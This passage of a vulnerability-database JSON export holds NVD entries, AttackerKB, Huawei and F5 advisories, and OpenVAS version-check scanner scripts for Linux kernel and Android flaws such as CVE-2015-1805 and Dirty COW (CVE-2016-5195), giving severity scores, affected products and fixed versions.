"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "The MediaTek Wi-Fi kernel driver in Android 6.0.1 before 2016-03-01 allows attackers to gain privileges via a crafted application, aka internal bug 26267358.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-12T21:59:00", "title": "CVE-2016-0820", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0820"], "modified": "2016-11-28T19:55:00", "cpe": ["cpe:/o:google:android:6.0.1"], "id": "CVE-2016-0820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0820", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:22", "description": "The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an \"I/O vector array overrun.\"", "edition": 6, "cvss3": {}, "published": "2015-08-08T10:59:00", "title": "CVE-2015-1805", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1805"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:google:android:6.0", "cpe:/o:linux:linux_kernel:3.15.10", "cpe:/o:google:android:5.1.1", "cpe:/o:google:android:5.1", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.0.1"], "id": "CVE-2015-1805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1805", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.10:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 18, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": "2020-02-17T16:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:19", "bulletinFamily": "software", "cvelist": ["CVE-2015-0569", "CVE-2015-0570", "CVE-2015-0571"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2016-01-29T00:00:00", "published": "2015-11-24T00:00:00", "id": "HUAWEI-SA-20151124-01-SMARTPHONE", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-462918", "title": "Security Advisory - Memory Overflow Vulnerability in the Huawei Smartphone", "type": "huawei", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2017-06-08T00:16:21", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "edition": 1, "description": "\nF5 Product Development has assigned ID 527660 (BIG-IP), ID 530553 (Enterprise Manager), ID 530554 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \n \nBIG-IP AAM | 11.4.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP Analytics | 11.0.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP APM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP ASM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP DNS \n| None \n| 12.0.0 \n| Not vulnerable | None \n \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP Link Controller | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP PEM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | 3.0.0 - 3.1.1 \n| None \n| Medium | Linux kernel \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable \n| None \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 \n| None \n| Medium | Linux kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | None \n| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable | None \n\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for BIG-IP, Enterprise Manager, and BIG-IQ, you should permit access to the system only over a secure network and limit login access to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:33:00", "published": "2015-10-20T02:20:00", "href": "https://support.f5.com/csp/article/K17458", "id": "F5:K17458", "title": "Linux kernel vulnerability CVE-2015-1805", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:56", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "edition": 1, "description": "Recommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for BIG-IP, Enterprise Manager, and BIG-IQ, you should permit access to the system only over a secure network and limit login access to trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "modified": "2015-10-19T00:00:00", "published": "2015-10-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/400/sol17458.html", "id": "SOL17458", "title": "SOL17458 - Linux kernel vulnerability CVE-2015-1805", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** &gt; **Identified** &gt; **High** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-04-07T18:46:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-10-21T00:00:00", "id": "OPENVAS:1361412562310105417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105417", "type": "openvas", "title": "F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105417\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/400/sol17458.html?sr=48878043\");\n\n script_tag(name:\"impact\", value:\"A local unprivileged user may use this flaw to crash the system, or potentially escalate their privileges on the system.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an 'I/O vector array overrun.' (CVE-2015-1805)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-21 15:00:41 +0200 (Wed, 21 Oct 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Oracle Linux Local Security Checks ELSA-2015-1042", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123109", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1042", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1042.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123109\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:29 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1042\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1042 